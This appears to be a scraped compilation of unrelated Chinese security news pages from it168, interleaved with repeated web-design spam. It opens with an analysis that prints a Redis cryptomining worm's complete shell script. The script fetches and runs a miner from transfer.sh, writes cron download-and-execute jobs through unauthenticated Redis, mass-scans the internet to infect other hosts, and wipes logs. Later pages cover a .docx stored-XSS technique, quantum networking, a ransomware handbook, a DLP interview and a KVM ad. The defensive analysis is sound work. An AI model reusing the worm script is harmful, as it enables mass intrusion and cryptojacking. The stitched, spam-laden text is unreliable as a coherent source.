Linux Redis自動化挖礦感染蠕蟲分析及建議

網站內容來源http://server.it168.com/

Linux Redis自動化挖礦感染蠕蟲分析及建議

2018-05-30 17:06    來源:安全客  作者: 雲鼎實驗室 Fooying 編輯:
0購買

  一、 背景

  自從Redis未授權問題獲取Linux系統root權限的攻擊方法的披露后,由於其易用性,利用該問題入侵Linux服務進行挖礦、掃描等的黑客行為一直層出不窮;而在眾多利用該問題入侵服務器進行黑產行為的案例中,其中就存在一類利用該問題進行挖礦並且會利用pnscan自動掃描感染其他機器;該類攻擊一直存在,不過在近期又呈現數量增加的趨勢,在最近捕獲到多次,我們針對其做下具體的分析。

  二、 漏洞說明

  首先針對利用的漏洞做個說明,Redis 默認情況下,會綁定在 0.0.0.0:6379,在沒有利用防火牆進行屏蔽的情況下,將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的 ~/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器;如果Redis服務是以root權限啟動,可以利用該問題直接獲得服務器root權限。相關漏洞詳情可以參考:

  https://www.seebug.org/vuldb/ssvid-89715

  以下為漏洞利用演示(上傳不了視頻,播放地址:https://v.qq.com/x/page/u0661b9o772.html):

  經過在ZoomEye和SHODAN檢索,可以發現分別眾多Redis服務開放在公網上,這些服務都可能成為攻擊目標。

  三、 入侵分析

  經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:1、掃描開放6379端口的Linux服務器(後續感染掃描網段為1.0.0.0/16到224.255.0.0/16)

  2、通過redis-cli嘗試連接Redis並執行預置在.dat文件里的利用命令將Redis的數據文件修改為/var/spool/cron/root,然後通過在Redis中插入數據,將下載執行腳本的動作寫入crontab任務

  3、通過腳本實現以上的相關行為,完成植入並啟動挖礦程序

  4、再編譯安裝pnscan,繼續掃描感染下一個目標

  四、 腳本分析

  整個入侵利用以及後續的感染的實現,最主要的功能都是基於通過Redis問題寫入crontab任務中下載執行的NaNd腳本(https://transfer.sh/MIpIA/tmp.9kIguIhkI7)來實現的,通過對它的分析,我們基本能夠得到整個流程的所有細節,這是一個base腳本,我們通過解讀來分析下它的相關功能。

  1. sleep 1

  2. find . -maxdepth 1 -name “.mxff0” -type f -mmin +60 -delete

  3. [ -f .mxff0 ] && exit 0

  4. echo 0 > .mxff0

  這部分代碼只要是用作重複執行的判斷,將.mxff0文件作為標記文件,如果存在該文件則代表機器上已執行腳本,直接退出,否則寫.mxff0文件並進行下一步動作;

  5. trap “rm -rf .m* NaNd tmp.* .r .dat $0” EXIT

  設置預置動作,在腳本退出后刪除相關文件和腳本自身;

  6. setenforce 0 2>/dev/null

  7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

  8. crontab -r 2>/dev/null

  9. rm -rf /var/spool/cron 2>/dev/null

  10. grep -q 8.8.8.8 /etc/resolv.conf || echo “nameserver 8.8.8.8” >> /etc/resolv.conf

  11. rm -rf /tmp/* 2>/dev/null

  12. rm -rf /var/tmp/* 2>/dev/null

  13. rm -rf /etc/root.sh 2>/dev/null

  14. sync && echo 3 > /proc/sys/vm/drop_caches

  15. cat <<EOF> /etc/security/limits.conf

  16. * hard nofile 100000

  17. * soft nofile 100000

  18. root hard nofile 100000

  19. root soft nofile 100000

  20. * hard nproc 100000

  21. * soft nproc 100000

  22. root hard nproc 100000

  23. root soft nproc 100000

  24. EOF

  這部分主要是修改系統的配置,6、7行為關閉SELINU;

  然後清空/var/spool/cron,進而判斷系統DNS服務器是否存在8.8.8.8,沒有則添加;

  11-13則清空系統tmp目錄和刪除相關文件;

  14行清空系統緩存,而15-24則是修改系統的資源限制;

  25. iptables -I INPUT 1 -p tcp –dport 6379 -j DROP

  26. iptables -I INPUT 1 -p tcp –dport 6379 -s 127.0.0.1 -j ACCEPT

  27. ps xf | grep -v grep | grep “redis-server|nicehash|linuxs|linuxl|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|.sshd|/tmp/init” | while read pid _; do kill -9 “$pid”; done

  這裏再進一步的增加iptables限制6379端口只允許本地訪問,同時kill相關包含挖礦、redis客戶端、爬蟲等進程,這裏的目的也比較簡單,避免被其他黑客再次入侵,同時清除可能其他黑客入侵啟動的進程;

  28. rm -rf /tmp/* 2>/dev/null

  29. rm -rf /var/tmp/* 2>/dev/null

  30. echo 0 > /var/spool/mail/root

  31. echo 0 > /var/log/wtmp

  32. echo 0 > /var/log/secure

  33. echo 0 > /root/.bash_history

  清除相關登錄日誌、命令操作歷史;

  34. YUM_PACKAGE_NAME=”iptables gcc redis coreutils bash curl wget”

  35. DEB_PACKAGE_NAME=”coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl”

  36. if cat /etc/*release | grep -i CentOS; then

  37. yum clean all

  38. yum install -y -q epel-release

  39. yum install -y -q $YUM_PACKAGE_NAME

  40. elif cat /etc/*release | grep -qi Red; then

  41. yum clean all

  42. yum install -y -q epel-release

  43. yum install -y -q $YUM_PACKAGE_NAME

  44. elif cat /etc/*release | grep -qi Fedora; then

  45. yum clean all

  46. yum install -y -q epel-release

  47. yum install -y -q $YUM_PACKAGE_NAME

  48. elif cat /etc/*release | grep -qi Ubuntu; then

  49. export DEBIAN_FRONTEND=noninteractive

  50. rm -rf /var/lib/apt/lists/*

  51. apt-get update -q –fix-missing

  52. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  53. elif cat /etc/*release | grep -qi Debian; then

  54. export DEBIAN_FRONTEND=noninteractive

  55. rm -rf /var/lib/apt/lists/*

  56. apt-get update –fix-missing

  57. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  58. elif cat /etc/*release | grep -qi Mint; then

  59. export DEBIAN_FRONTEND=noninteractive

  60. rm -rf /var/lib/apt/lists/*

  61. apt-get update –fix-missing

  62. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  63. elif cat /etc/*release | grep -qi Knoppix; then

  64. export DEBIAN_FRONTEND=noninteractive

  65. rm -rf /var/lib/apt/lists/*

  66. apt-get update –fix-missing

  67. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  68. else

  69. exit 1

  70. fi

  71. sleep 1

  72. if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

  73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

  74. sleep 1

  75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

  76. fi

  這一長串的內容主要目的是下載並編譯安裝pnscan,從內容中我們可以看到對於不同操作系統的判斷然後安裝依賴的相關模塊,然後才是從github下載pnscan的源碼進行編譯安裝;至於為什麼採用編譯安裝的形式,猜測是出於兼容不同系統以及每次編譯生成的pnscan的MD5都不一樣,避免形成固定特徵;

  77. tname=$( mktemp )

  78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge

  79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL

  80. NMURL=$( curl -s –upload-file $tname https://transfer.sh )

  81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

  這部分主要是下載挖礦程序並重命名為.gpg,增加執行權限,執行后刪除,同時重新上傳到https://transfer.sh/ 獲取新的鏈接;

  82. [ -z “$NMURL” ] && NMURL=$OMURL

  83. ncmd=$(basename $(mktemp))

  84. sed ‘s|’”$OMURL”‘|’”$NMURL”‘|g’ < NaNd > $ncmd

  85. NSURL=$( curl -s –upload-file $ncmd https://transfer.sh )

  86. echo ‘flushall’ > .dat

  87. echo ‘config set dir /var/spool/cron’ >> .dat

  88. echo ‘config set dbfilename root’ >> .dat

  89. echo ‘set Backup1 “tn*/2 * * * * curl -s ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  90. echo ‘set Backup2 “tn*/5 * * * * wget -O NaNd ‘${NSURL}’ && bash NaNdnt”‘ >> .dat

  91. echo ‘set Backup3 “tn*/10 * * * * lynx -source ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  92. echo ‘save’ >> .dat

  93. echo ‘config set dir /var/spool/cron/crontabs’ >> .dat

  94. echo ‘save’ >> .dat

  95. echo ‘exit’ >> .dat

  而這部分內容主要是生成新的.dat文件,包含將原來NaNd腳本里的里挖礦程序的下載地址替換為上一步上傳到https://transfer.sh/ 得到的新地址,還有Redis利用的相關語句;

  96. pnx=pnscan

  97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

  98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

  99. for x in $( seq 1 224 | sort -R ); do

  100. for y in $( seq 0 255 | sort -R ); do

  101. $pnx -t512 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ $x.$y.0.0/16 6379 > .r.$x.$y.o

  102. awk ‘/Linux/ {print $1, $3}’ .r.$x.$y.o > .r.$x.$y.l

  103. while read -r h p; do

  104. cat .dat | redis-cli -h $h -p $p –raw &

  105. done < .r.$x.$y.l

  106. done

  107. done

  而步主要是調用pnscan去掃描子網段1.0.0.0/16到224.255.0.0/16中開放6379端口並且操作系統為Linux的目標,然後利用redis-cli執行.dat中的命令,進行下個目標的感染;這裏pnscan的-W參數值‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’轉換后內容‘*1rn$4rnINFOrn’,是向目標Redis服務發送請求獲取Redis服務器的各種信息和統計數值,再通過-R參數值‘6f 73 3a 4c 69 6e 75 78′(轉換后內容為os:Linux)判斷是否Linux系統。

  108. echo 0 > /var/spool/mail/root 2>/dev/null

  109. echo 0 > /var/log/wtmp 2>/dev/null

  110. echo 0 > /var/log/secure 2>/dev/null

  111. echo 0 > /root/.bash_history 2>/dev/null

  112. exit 0

  最後就是收尾工作,清除相關日誌和命令執行歷史,同時在腳本退出的時候會觸髮腳本一開始用trap預置的動作,會做刪除操作,刪除相關文件和腳本自身(rm -rf m* NaNd tmp.* .r .dat $0)。

  通過對腳本的解讀,我們基本已經清楚整個蠕蟲的行為和入侵流程,也就是我們開始所描述的流程。

  另外,通過閱讀腳本,我們發現雖然整個入侵流程並不是多複雜,但腳本其實有很多”工程化”的細節考慮,不得不讓人驚嘆入侵者的”考慮周到”:

  1、 利用.mxff0文件做重複執行檢驗,避免腳本的重複執行

  2、 為了增加成功性,一些環境的預處理:

  a) 關閉SELINUX

  b) 增加8.8.8.8的DNS

  c) 清空tmp目錄

  d) 清空系統緩存

  e) 修改系統資源限制

  3、 痕迹清除

  a) 利用trap預置動作好在腳本執行完成后刪除相關文件和腳本自身

  b) 重複清除相關登錄等日誌和命令執行歷史

  4、 同行預防

  a) 利用iptables避免Redis服務開放在公網上從而導致再次被入侵

  b) 清除同行可能遺留的入侵行為,kill相關進程

  5、 系統兼容性

  a) 判斷操作系統,針對性的執行相關命令,安裝依賴包,最大限度的提高pnscan編譯安裝的成功率

  b) 關閉SELINUX,通過setenforce和修改/etc/sysconfig/selinux兩種手段實現

  c) 寫入Crontab里的下載並執行腳本的任務,通過curl、wget、lynx三種方式實現

  d) Pnscan掃描增加操作系統判斷,減少沒有必要的感染嘗試

  6、 特徵去除,存活延續

  a) Pnscan採用安裝編譯的方式,既提高在不同系統下的兼容性,也避免形成固定的MD5特徵

  b) 利用https://transfer.sh 中轉,每一次感染均生成新的連接,避免固定鏈接形成固定特徵

  c) 下載到系統的相關文件均採用隨機生成的文件名

  正是由於入侵者種種的”考慮周到”使得他的入侵感染的成功率能夠達到的一定的層度。

  五、 安全建議

  病毒清理和系統恢復

  我們主要參考腳本的相關行為進行對應的行為恢復和刪除即可:

  1、 關閉SELINUX,根據系統原環境和業務需要重新開啟SELINUX

  2、 清空了/var/spool/cron,根據原先備份清空恢復

  3、 修改/etc/resolv.conf增加DNS服務8.8.8.8,如無影響可不處理,或者刪除

  4、 修改了系統資源限制(/etc/security/limits.conf),可根據備份情況恢復

  5、 增加了對6379端口的Iptables規則,如果不影響業務,建議保留

  6、 Kill了相關進程,檢查是否包含業務所需進程,根據情況恢復

  7、 安裝了相關包,具體列表見上文,可根據情況刪除或者如無影響可保留

  8、 編譯安裝了pnscan,可刪除/usr/local/bin/pnscan

  9、 清除了相關日誌和tmp目錄,對系統無影響,可忽略

  10、 啟動了挖礦進程和pnscan掃描感染,進程:.gpg、pnscan,直接kill

  還包含了一些中間文件,雖然腳本包含相關刪除操作,但建議還是全局查找確認:.mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  Redis服務加固

  1、 如無必要,修改bind項,不要將Redis綁定在0.0.0.0上,避免Redis服務開放在外網,可以通過iptables或者騰訊雲用戶可以通過安全組限制訪問來源

  2、 在不影響業務的情況,不要以root啟動Redis服務,同時建議修改默認的6379端口,大部分針對Redis未授權問題的入侵都是針對默認端口進行的

  3、 配置AUTH,增加密碼校驗,這樣即使開放在公網上,如果非弱口令的情況,黑客也無法訪問Redis服務進行相關操作

  4、 使用rename-command CONFIG “RENAME_CONFIG”重命名相關命令,這樣黑客即使在連接上未授權問題的Redis服務,在不知道命令的情況下只能獲取相關數據,而無法進一步利用

  六、 附錄

  IOCs

  1. 腳本 https://transfer.sh/MIpIA/tmp.9kIguIhkI7

  2. 挖礦程序 2918ee2b69bc4e6b581c7b25f08434fe

  3. 礦池域名 http://jb.chakpools.com/

  4. 相關文件名 .mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  鏈接

  1. 樣本 https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6

  2. Pnscan項目地址 https://github.com/ptrrkssn/pnscan

  3. 漏洞說明 https://www.seebug.org/vuldb/ssvid-89715

  4. 漏洞利用演示 https://v.qq.com/x/page/u0661b9o772.html

  5、雲鏡產品官網 https://cloud.tencent.com/product/hs

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

新手上路 | 上傳Word文件形成存儲型XSS路徑

網站內容來源http://server.it168.com/

新手上路 | 上傳Word文件形成存儲型XSS路徑

2018-05-31 13:25    來源:FreeBuf.COM  作者: clouds 編譯 編輯:
0購買

  在滲透測試過程中,每當看到目標測試網站存在上傳功能時,總會激起我的好奇心。如果能夠走運的話,若目標網站服務器是PHP或ASP架構,而且上傳功能沒作後綴過濾,這樣就能導致可以直接上傳反彈腳本形成控制。如果這招行不通,我會嘗試上傳一個HTML頁面去觸發我自己設置的客戶端javascript腳本形成XSS攻擊。本文我就分享一個上傳docx文件形成存儲型XSS漏洞的實例。

  測試上傳功能

  剛好在某次Web測試工作中,我發現目標網站上傳功能中,用一個未授權用戶即可上傳自己的文件,該上傳功能中允許用戶上傳.docx文件:

  當把這種.docx文件上傳之後,它還能被下載。通過比較發現,上傳成功的文件uploaded.docx和服務器上其對應的可下載文件downloaded.docx之間存在着一些不同,也就是說,文件上傳成功之後,在提供下載之前,服務器會對這個上傳文件進行一些處理操作,之後,再提供下載。

  

  用來上傳的文件必須是一個有效的.docx文件,那基於瀏覽器的解析显示來說,它可能會把它轉換為html格式來显示,那我能不能把它後綴作個更改呢?所以我先來試試在POST請求中把.docx後綴更改為.html看看:

  當這個.html文件上傳之後,向服務器請求這個文件后,服務器會把其Content-Type頭默認為text/html,這樣的話,瀏覽器會把這個文件解析為HTML執行:

  插入XSS Payload

  這樣,我就想到了把XSS Payload捆綁到一個像下圖這樣的.docx壓縮文件中去。由於這是.docx經直接把後綴更改為.zip的壓縮格式文件包樣例,我需要確定在上傳或Web解析過程中某些不會被轉儲更改的區域,最後,我發現了這種docx變zip壓縮格式包中的某些文件路徑會保持原樣,像下圖這樣,我把其中的Settings.xml文件名加上了一長串字母好待區分。

  之後,再把這個zip格式後綴還原為docx格式,用UItraEdit查看hex代碼,再在保持原樣的區域中覆蓋掉一些字節,插入我自己設置的JavaScript XSS代碼:

  上傳時,服務器能正常接收這個經過構造的.docx文件,在HTTP POST過程中,我把它的後綴更改為.html後綴進行了最終上傳:

  向服務器請求這個文件時,它能被服務器解析為HTML文件,其中包含了完整的之前插入的XSS Payload代碼:

  當然瀏覽器解析之後,也能成功執行其中插入的XSS Payload:

  為了對這種XSS攻擊進行混淆隱蔽,攻擊者可以在其中加入一個包含URI統一資源標識符的隱藏iframe框架,能對受害者產生迷惑效果,像下圖這樣:

  防護措施

  這樣的效果對於開發者來說應該採取以下手段來進行限制。

  文件上傳之前,在服務器端驗證上傳文件格式是否為.doc或.docx有效格式;

  嚴格限制Content-Type頭,對Content-Type頭或特定後綴格式更改過的上傳文件須保持與上傳文件相同的Content-Type頭信息;

  控制文件下載時的其它操作情況,添加響應標頭:“Content-Disposition: attachment”,以防止在瀏覽器中內嵌显示文件;

  過濾掉所有包含HTML標籤的上傳,因為docx可經壓縮篡改其中包含的HTML文件。

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

英國電信建成幾乎不可破解的量子安全網絡

網站內容來源http://server.it168.com/

英國電信建成幾乎不可破解的量子安全網絡

2018-07-26 13:34    原創  作者: smart編譯 編輯:
0購買

  【IT168 技術】日前,英國最大的互聯網供應商宣稱已經建成了一條長達75英里的量子安全高速光纖鏈路。

  量子安全高速光纖鏈路的原理是:光纖鏈路上的光子在與數據相同的連接上攜帶加密密鑰。如果這些光子遭到惡意劫持,就會立即通知系統密鑰已經損壞,竊取者干擾這些密鑰也會使它們有所改變,然後它們就不能被攔截者使用,並且數據流量會立即變為亂碼。

  量子安全高速光纖鏈路

      即將離任的英國電信公司首席執行官Gavin Patterson在6月在倫敦召開的“物聯網世界歐洲論壇”中表示,“英國電信公司及其合作夥伴的光纖鏈路是世界第一個真實安全的量子高速網絡,它實際上是“不可攻擊的”。英國電信公司在新聞發布會上稱,這條光纖鏈路在劍橋大學工程系和英國薩福克郡的BT實驗室之間運行,其設備來自ID Quantique和ADVA光纖網絡。

  專家說,糾纏密鑰(例如量子密鑰分發中使用的加密密鑰)是不可破壞的。這是因為密鑰中使用的亞原子粒子是緊密地交織在一起,以至於它們在物理上處於鏈接的任何地方都會相互影響。加密密鑰會發生變化時,網絡管理員可以隨時查看數據是否被弄亂或被刪除。因此,任何中斷都會非常快速地顯現出來並因此被標記。其額外的好處是無法使用更改的密鑰。英國電信公司開始向最終用戶展示其安全性。

  英國電信公司並不是第一家採用量子密鑰分發(QKD)鏈接的公司。2017年5月,中國山東省濟南市開通了一個商用量子通信專網,西班牙也有一個類似的項目。

  英國劍橋大學是英國電信公司的量子網絡終端站點,也是量子通信中心(這是由8家英國大學和私營企業組成的聯盟以及與英國電信合作的團隊)建立了三個站點的量子密鑰分發(QKD)連接的樞紐。這個聯盟於6月表示,其量子通信網絡能夠在多個100千兆位通道中發送超級安全數據,並以每秒2到3兆比特的速度生成光子密鑰。英國電信公司表示其鏈接以每秒500千兆位的速度發送數據。

  使用光子來保護網絡

  量子密鑰分發工作中使用的光子可能最終會保護未來的網絡,並最終成為未來量子計算的一個關鍵因素。

  馬里蘭大學在一篇新聞文章中解釋說,這是光子攜帶量子計算的突破,因此它們可以移動量子比特(量子信息載體),因為它們可以傳播並與芯片一起工作。

  馬里蘭大學研究人員表示已經發明了第一個半導體芯片的單光子晶體管,換句話說就是光子晶體管。傳統的晶體管是用於各種計算形式的路由開關。而單光子晶體管生成一個基於光子的開關,其中開關相互作用,可以實現某些計算問題的指數加速。而光子本身不會相互產生作用。

  “單光子晶體管十分微小,100萬個晶體管的體積相當於一粒鹽,並且速度快,能夠每秒處理100億個光子量子比特。”馬里蘭大學研究人員說。

  “量子通信技術在保護數據和通信方面開始發揮重要作用,在當今易受攻擊的時代,量子計算機的表現要比現有加密技術要好得多。”與英國電信項目相關的IDQ公司負責人GrégoireRibordy博士表示。

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

一份超級實用的勒索病毒應急手冊!含完整版下載

網站內容來源http://server.it168.com/

一份超級實用的勒索病毒應急手冊!含完整版下載

2019-03-18 20:17    原創  作者: 安恆信息EDR團隊 編輯:
0購買

  2017年以來,勒索病毒已發生三次全球範圍的爆發,持續不斷的更新變種,讓各行業機構與企業防不勝防。近期,勒索病毒卷土重來,從醫院到政府,目前已有多個部門和組織遭受病毒危害,業務系統癱瘓或遭受直接經濟損失。

  變種勒索病毒突襲醫院

  2019年3月以來,兩個變種勒索病毒“GandCrab V5.2”和“GlobeImposter3.0”頻頻出現。3月初“GlobeImposter3.0”襲擊多家醫療機構,將其文件加密並主要以動物名稱+4444的格式命名。

  “GandCrab V5.2”和“GlobeImposter3.0”更傾向於通過爆破RDP服務弱口令擴散,而“GandCrab V5.2”的加密方式不同於“GlobeImposter”和“GandCrab”之前版本的分組密碼AES+RSA加密,改用流密碼Salsa20+RSA進行加密。

  多地政府部門接連中招

  境外黑客組織近期又向我國政府部門開展勒索病毒郵件攻擊。郵件主題為“你必須在3月11日下午3點向警察局報到!”,郵件附件名為“03-11-19.rar”。經分析,附件包含勒索病毒GandCrab V5.2,運行後效果與前幾個版本類似,加密后勒索信會提示安裝洋蔥瀏覽器(Tor Browser),訪問付費鏈接,根據提示繳付贖金。我國部分政府部門郵箱已遭到攻擊,多地政府、高校等都已發布預警通報。

  事實上,當遭到勒索病毒攻擊時,通過正確的應急處理措施可以有效避免更大範圍損失;提前採取合理的預案能夠保障系統免受勒索病毒影響。

  安恆信息EDR產品團隊與公司服務、技術等部門,將大量應急響應經驗總結為《勒索病毒應急與響應手冊》。手冊中提供一系列緊急預案及實施措施,幫助中招用戶迅速開展自救,在專業人員到場處理前遏制影響範圍,盡可能降低損失。對於還未發現情況的用戶,手冊也提供給出一系列預防建議,防患於未然。

  《勒索病毒應急與響應手冊》

         瀏覽下載地址:

  我們按照病毒發現后的處理順序,給出具體方法和步驟,包括:判斷狀態、響應措施、具體處理方法等幾個部分。其中,應急處理的對象分為加密系統和未加密系統兩類,根據不同系統等級,建議分別處理。手冊中提供完整教程,用戶可參照自行完成處理措施,以確保在專業人員到場之前控制病毒影響範圍。對於已加密的系統給出5種處理方法,其中支付解密並不建議選擇。

  關於不同業務系統的病毒防護,手冊提供6種具體方式:

  第1節:通過優化系統本身的安全配置提升安全防護能力,包括策略配置與安全意識等;

  第2、3節:針對網絡邊界和終端主機,不同對象採取不同措施;

  第4節:如何通過專業的安全人員提供技術服務,增強系統安全性;

  第5節:對於安全要求極高的工控系統,如何開展特殊安全防護措施;

  第6節:病毒中招后的終極保障——勒索保險。

  通過使用手冊,無論是在面對勒索病的事前、事中、事後都能選擇合理的措施來防治或應急響應,安恆信息希望這本手冊能夠幫助用戶提升系統免疫能力,避免因病毒突襲帶來的聲譽及經濟損失。

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

訪天空衛士劉霖:做雲時代最強DLP產品

網站內容來源http://server.it168.com/

訪天空衛士劉霖:做雲時代最強DLP產品

2016-07-01 13:16    原創  作者: 閆志坤 編輯:
0購買

  【IT168評論】2016年6月23日,賽可達實驗室與國家計算機病毒應急處理中心、國家網絡與信息系統安全產品質量監督檢驗中心、中國國際技術轉移中心、首都創新大聯盟共同主辦的第四屆中國網絡安全大會(NSC2016)在國家會議中心隆重舉行。在大會上,天空衛士CEO劉霖做了《雲時代如何管理、保護企業的信息資產》演講,分享了對於UCS統一內容安全技術,才能有效解決APT等新威脅。

▲天空衛士CEO劉霖

  雲時代下 UCS技術

  隨着雲計算的快速發展,企業紛紛將企業業務遷移到雲平台,但如果沒有這樣足夠的安全意識,不是安全技術,而是管理意識,如果不夠強的話,即便是安全公司自己也會出現安全風險。

  對於大家所談的大數據安全,劉霖表示,對於大數據安全裏面最重要的兩個部分,第一是行為分析,第二是內容智能分析,就是統一內容安全技術(UCS),只有UCS統一內容安全技術 才能有效解決APT等新威脅,而UCS統一內容安全包括了web安全網關、郵件安全網關、DLP數據防泄漏、接入安全雲、移動安全,DLP是APT攻擊的最後一套防線,也是內部信息泄露的最後一道防線。

  對於為何要做DLP產品?,劉霖表示,隨着國內安全形式加劇,美國UCS產品的在國內用戶超過3000家客戶,還沒有國產DLP產品,為了能讓中國企業用上國產技術,天空衛士推出了出雲DLP產品,讓中小企業也有使用DLP產品的權利,保護自己的數據資產。

  性能超越同類5倍

  對於天空衛士的DLP產品性能又是怎樣的呢?“目前軟件類數據防泄漏產品,強在攔截,弱點是性能,但是天空衛士DLP產品採取硬件形式,天空衛士DLP產品性能是國外DLP產品的5倍,劉霖說道,目前也正是替換洋產品關鍵時刻,只有把UCS技術掌握在中國人自己手裡,填補國內空白,未來要做一家得到全球同行尊重和認可的信息安全公司。

  目前,天空衛士公司達到了上百人,其中研發佔據80%,研發人員都自來着業界著名公司,但安全不是一家獨大就能解決所有問題,安全市場更需要眾人拾柴火焰高,因此天空衛士也真誠歡迎用戶和合作夥伴,劉霖強調,天空衛士將堅持三不原則,1、產品不非法使用集成的第三方軟件,絕不盜版、絕不破解。不把用戶當小白鼠,把未開發完成的產品當成熟產品賣,不開發只為滿足用戶測試條件而突擊的“產品”,願意與國內WAF、NGFAW、雲應用廠商緊密合作。給用戶提供無縫的接入安全解決方案。

  為了加強企業用戶對於天空衛士DLP產品的認知,天空衛士開啟了百萬獎金,免費試用計劃,試用條件:企業互聯網使用人數在500人以上即可,人數多的單位從優,為體現天空衛士對產品品質的信心,活動期間天空衛士準備了總共一百萬的“抓蟲獎金”。發現產品質量問題給予獎金獎勵,發現重大問題最高可以給予獎勵10萬。

  總結:最後劉霖也透露,將在7月份發布新一代DLP產品,產品性能更強,滿足國內用戶需求,真正為中國信息安全行業做些事情。相信在這樣的信念之下,天空衛士能夠做出最強的DLP產品,一切讓我們7月份見證!

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司、台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦、台中網頁設計公司推薦專業設計師"嚨底家"!!

ATEN CL5708MA多電腦切換器僅售6400元

網站內容來源http://server.it168.com/

ATEN CL5708MA多電腦切換器僅售6400元

2017-01-03 17:28    原創  作者: 上海分站 編輯:
0購買

ATEN CL5708MA作為一款切換器,可通過一組PS/2或USB KVM控制端(鍵盤、鼠標及显示器)存取多台服務器,可分別直接管理8台服務器,通過菊鏈方式另外再串接31台KVM多電腦切換器,即可從單一控制端管理多達256台服務器。此款在商家“上海勁嘉”(021-54900115 QQ:95894690)僅售6400元,感興趣的朋友不妨關注一下。

ATEN CL5708MA採用17寸LCD液晶屏幕、鍵盤及鼠標觸控板整合於一個1U的抽拉式控制端模塊內的面板上,提供了硬件切換按鈕,可以很容易地在8台計算機間切換显示和控制,而且也有相應指示燈來提示用戶目前使用的輸入源。通過鍵盤上的Scroll Lock和其他鍵的組合,我們可以很方便地將視頻切換到不同的計算機上,即便是蘋果機也有相應的組合控制鍵來實現各種切換功能。對於8台計算機需要集中控管,CL5708M上的8個USB端口就可以派上用場。該產品支持雙向切換功能,可彈性地讓不同平台交換與互通,允許PC、外圍裝置、音頻功能等獨立切換,無需受限於KVM切換器的切換鎖定。

ATEN CL5708MA採用了OSD屏幕選單、熱鍵、面板按鍵三種切換方式,對於企業機房或數據中心的空間及信息環境能創造廣大的效益,不只能降低能源消耗、節省機架與機房空間,還能避免多餘的鍵盤、显示器與鼠標所造成的雜亂。

[商家名稱] 上海勁嘉電腦配件有限公司

[聯繫方式] 13601954068 021-54900115

[聯 系 人] 毛先生

[聯繫地址] 漕溪北路41號1103室

, , ,
網站內容來源http://safe.it168.com/

【精選推薦文章】

